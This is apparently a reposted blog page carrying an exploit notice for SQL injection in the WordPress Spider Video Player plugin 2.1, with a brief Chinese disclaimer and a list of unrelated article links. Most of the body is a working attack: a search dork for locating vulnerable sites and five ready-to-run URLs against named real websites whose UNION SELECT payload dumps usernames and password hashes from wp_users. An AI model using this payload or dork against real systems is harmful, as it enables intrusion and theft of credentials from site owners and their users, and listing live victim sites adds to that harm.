• Wordpress Spider Video Player plugin SQL Injection

    测试方法:

    程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
      1. # Exploit Title : Wordpress Spider Video Player plugin SQL Injection
      2. #
      3. # Exploit Author : Ashiyane Digital Security Team
      4. #
      5. # Plugin Link : http://web-dorado.com/
      6. #
      7. # Home : www.ashiyane.org
      8. #
      9. # Security Risk : High
      10. #
      11. # Version : 2.1
      12. #
      13. # Dork : inurl:wp-content/plugins/player/settings.php?playlist=
      14. #
      15. # Tested on: Linux
      16. #
      17. ##############
      18. #Location:site/wp-content/plugins/player/settings.php?playlist=[num]&theme=[SQL]
      19. #
      20. #
      21. #DEm0:
      22. # http://www.voyager-channel.org/wp-content/plugins/player/settings.php?playlist=2&theme=-1+union+select+1,2,3,group_concat%28user_login,0x3a,user_pass%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+wp_users--
      23. #
      24. # http://juanmontoyalopez.es/wordpress/wp-content/plugins/player/settings.php?playlist=1&theme=-6+union+select+1,2,3,group_concat%28user_login,0x3a,user_pass%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+wp_users--
      25. #
      26. # http://tremendum.org/wp-content/plugins/player/settings.php?playlist=1&theme=-7+union+select+1,2,3,group_concat%28user_login,0x3a,user_pass%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+wp_users--
      27. #
      28. # http://generalcapitalinvestments.com/wp-content/plugins/player/settings.php?playlist=1&theme=-4+union+select+1,2,3,group_concat%28user_login,0x3a,user_pass%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+wp_users--
      29. #
      30. # http://www.lancssa.com/wp-content/plugins/player/settings.php?playlist=2&theme=-7+union+select+1,2,3,group_concat%28user_login,0x3a,user_pass%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+wp_users--
      31. #
      32. ##############
      33. #Greetz to: My Lord ALLAH
      34. ##############
      35. #
      36. # Amirh03in
      37. #
      38. ##############
  • 相关阅读:
    Git 简要教程
    SDK更新失败问题解决
    常用安卓操作
    MongoDB本地安装与启用(windows 7/10)
    windows 快捷键收集
    windows 常用命令
    Lambda Expression Introduction
    对 load_breast_cancer 进行 SVM 分类
    Support Vector Machine
    使用 ID3 对 Titanic 进行决策树分类
  • 原文地址:https://www.cnblogs.com/security4399/p/3015576.html
Copyright © 2020-2023  润新知